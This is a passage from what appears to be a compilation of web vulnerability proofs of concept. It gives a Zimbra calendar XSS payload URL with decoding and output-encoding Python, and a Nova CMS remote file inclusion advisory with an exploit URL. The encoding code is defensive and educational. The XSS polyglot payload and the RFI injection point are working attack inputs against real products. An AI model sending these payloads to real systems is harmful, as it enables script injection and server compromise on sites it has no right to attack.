http://www.example.com/zimbra/h/calendar?view=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
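The RabbitWiki and Zimbra entries above are the same bug in two output contexts: RabbitWiki reflects "title" into HTML markup, while the Zimbra payload is built to break out of a JavaScript string (it closes both ' and " quoted strings, then closes the script element). The Python below is an added example (not code from either product) that decodes the Zimbra query string so the payload's structure is visible, then shows the encoding each context needs: html.escape for the HTML context and JSON encoding with "</" neutralised for the script-string context. The page templates it renders into are assumptions for the example.

```python
import html
import json
from urllib.parse import unquote, urlsplit

ZIMBRA_POC = ("http://www.example.com/zimbra/h/calendar?view=%27;alert%28String.fromCharCode%2888,83,83%29%29//"
              "\\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//"
              "\\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3E"
              "alert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E")


def query_param(url: str, name: str) -> str:
    """Fetch one query parameter, splitting on '&' only (the payload contains ';' itself)."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote(value)
    return ""


def render_title_html(title: str) -> str:
    """HTML body context (RabbitWiki 'title'): escape &, <, >, ' and "."""
    return f"<h1>{html.escape(title, quote=True)}</h1>"


def embed_js_string(value: str) -> str:
    """JavaScript string-literal context (Zimbra 'view'): JSON encoding escapes quotes and
    backslashes; '</' is additionally escaped so the HTML parser cannot see '</script>'."""
    return json.dumps(value).replace("</", "<\\/")


def render_view_script(view: str) -> str:
    return f"<script>var view = {embed_js_string(view)};</script>"


if __name__ == "__main__":
    view = query_param(ZIMBRA_POC, "view")
    print("decoded payload:", view)
    print(render_view_script(view))
    print(render_title_html('"><script>alert("rabbit says:hello")</script>'))
```

The payload's four alert() clauses each target a different quoting style (', \', ", \"), which is why per-context encoding matters: a filter that only strips <script> tags leaves the string-breakout variants intact, while JSON encoding turns every quote and backslash into an escape sequence the JavaScript parser reads as data.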
-
Nova CMS - '/administrator/modules/moduleslist.php?id' Remote File Inclusion
source: https://www.securityfocus.com/bid/51976/info

Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.

http://www.example.com/novacms/administrator/modules/moduleslist.php?id=[EV!L]